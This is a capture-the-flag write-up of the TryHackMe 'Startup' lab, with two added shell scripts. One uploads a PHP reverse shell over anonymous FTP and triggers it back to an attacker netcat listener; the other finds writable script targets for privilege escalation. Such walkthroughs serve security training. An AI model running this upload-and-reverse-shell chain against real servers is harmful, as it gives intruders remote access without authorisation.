STARTUP
Startup is a TryHackMe room built around a fictional new start-up company called Spice Hut. Their website is under development and they have some security concerns they wish to have tested.
I began by heading to the website and manually enumerating the site. It had very minimal functionality; I checked the source code and found nothing of interest. There is a contact link, which I hoped would lead to an email address, but the page it points to was empty.
I then ran a Gobuster scan to look for any pages I might be able to access. A directory named files was of particular interest.
Here I can see there is an FTP folder; on opening it, it is empty. I made a note of this, as I may be able to upload files to it at a later stage.
I then opened important.jpg, which seemed to be of no particular interest, while notice.txt contained the text below. I made a note of the name Maya, which could be a username later on. The notice also mentioned that people were able to download files from the website, which suggests there may be a way of uploading files too.
The next step was an Nmap scan to check for open ports on the target IP. There was an open FTP port that allowed anonymous access. Because the FTP folder is also served by the target's website, I immediately thought of pentestmonkey's PHP reverse shell.
I edited the PHP reverse shell so it had the appropriate IP address and port number, connected to the target's FTP service with anonymous credentials and uploaded the reverse shell using the put command.
I set up a Netcat listener to catch the PHP reverse shell I had uploaded via FTP, then triggered it by browsing to the file through the target website's FTP folder.
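The upload-and-trigger sequence from the three steps above, as an added example that is not part of the original write-up. It assumes pentestmonkey's php-reverse-shell.php is saved locally, an attacker address of 10.10.14.5 and listener port 4444 (both hypothetical), and that the anonymous FTP directory is served at /files/ftp/ on the target's web server, which is inferred from the /var/www/html/files/ftp path mentioned later in the write-up.

```shell
#!/bin/sh
# Added example, not from the original write-up. Assumes: pentestmonkey's
# php-reverse-shell.php saved locally, a hypothetical attacker address of
# 10.10.14.5 listening on 4444, and the anonymous FTP directory served by the
# target web server under /files/ftp/.

# 1. Point the reverse shell at our listener. pentestmonkey's file carries the
#    lines "$ip = '127.0.0.1';" and "$port = 1234;"; rewrite only those two.
patch_reverse_shell() {
    file=$1; lhost=$2; lport=$3
    sed -e "s/^[\$]ip = '[^']*';/\$ip = '${lhost}';/" \
        -e "s/^[\$]port = [0-9]*;/\$port = ${lport};/" "$file" > "$file.tmp" \
        && mv "$file.tmp" "$file"
}

# 2. Upload over anonymous FTP. -n stops the client from reading ~/.netrc, so
#    the "user" line below is the only login attempt; binary mode avoids the
#    client rewriting line endings in the PHP file.
upload_anonymous_ftp() {
    target=$1; file=$2
    ftp -n "$target" <<EOF
user anonymous anonymous
binary
put $file
quit
EOF
}

# 3. Start the listener first, then request the uploaded file so the web
#    server executes it. A shell that connects before nc is ready is lost.
trigger_shell() {
    target=$1; file=$2; lport=$3
    nc -lvnp "$lport" &
    sleep 1
    curl -s -o /dev/null "http://${target}/files/ftp/$(basename "$file")"
    wait
}

# Usage (target address is hypothetical):
#   patch_reverse_shell php-reverse-shell.php 10.10.14.5 4444
#   upload_anonymous_ftp 10.10.10.10 php-reverse-shell.php
#   trigger_shell 10.10.10.10 php-reverse-shell.php 4444
```

The sed patterns anchor on the exact variable assignments pentestmonkey ships, so a stray `$ip` elsewhere in the file is left alone; verify the result with `grep -n "^\$ip\|^\$port"` before uploading, because a shell that calls back to 127.0.0.1 fails silently.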
Using the ls -la command, I was able to find the file recipe.txt. I then ran cat recipe.txt to find the first flag.
I was unaware of the .pcapng file extension, but after some research I found it was a packet capture format, which contains information on captured packets (more details can be found at https://fileinfo.com/extension/pcapng). I then learned that a way to read these files was Wireshark, which came pre-installed on the TryHackMe virtual machine.
I copied the suspicious.pcapng file to /var/www/html/files/ftp and downloaded it to my machine.
I then tried the password found in the capture with lennie's username and was able to log in.
With this new, more privileged access, I was able to find the next flag.
While continuing to explore what I now had access to, I found directories named scripts and Documents. Documents did not contain anything of particular interest; scripts contained files called planner.sh and startup_list.txt. startup_list.txt is empty.
The script planner.sh echoes a variable into startup_list.txt and then executes /etc/print.sh. I made a note of the location of print.sh for further investigation.
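The check I would run next on print.sh, as an added example that is not part of the original write-up: list every absolute path a script references and flag the ones the current user can write to. It assumes planner.sh may be run by a scheduler with higher privileges than lennie, which the write-up does not establish; the file and directory names in the usage comment are taken from the write-up, the script contents in the comments are constructed.

```shell
#!/bin/sh
# Added example, not from the original write-up. Given a shell script such as
# planner.sh, list every absolute path it references and flag the ones the
# current user can write to. If a privileged scheduler runs the script (an
# assumption; the write-up does not say who runs planner.sh), a writable
# target such as /etc/print.sh is worth a closer look.

writable_referenced_paths() {
    script=$1
    # Absolute paths at the start of a line or after whitespace, ;, &, | or (
    grep -oE '(^|[;&|([:space:]])/[A-Za-z0-9_./-]+' "$script" \
        | sed -E 's/^[^/]*//' \
        | sort -u \
        | while read -r path; do
              # Only report paths that exist as regular files; a missing file
              # that a root process will later create is a different finding.
              [ -f "$path" ] || continue
              if [ -w "$path" ]; then
                  printf 'WRITABLE %s\n' "$path"
              else
                  printf 'readonly %s\n' "$path"
              fi
          done
}

# Also check the directory holding the script: if planner.sh itself can be
# replaced, the per-target check above is moot.
script_dir_writable() {
    if [ -w "$(dirname "$1")" ]; then echo yes; else echo no; fi
}

# Usage:
#   writable_referenced_paths /home/lennie/scripts/planner.sh
#   script_dir_writable /home/lennie/scripts/planner.sh
```

Run it as the user you currently hold, not as root: `-w` answers for the effective user, so a root shell reports everything as writable and tells you nothing about what lennie can change.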
Conclusion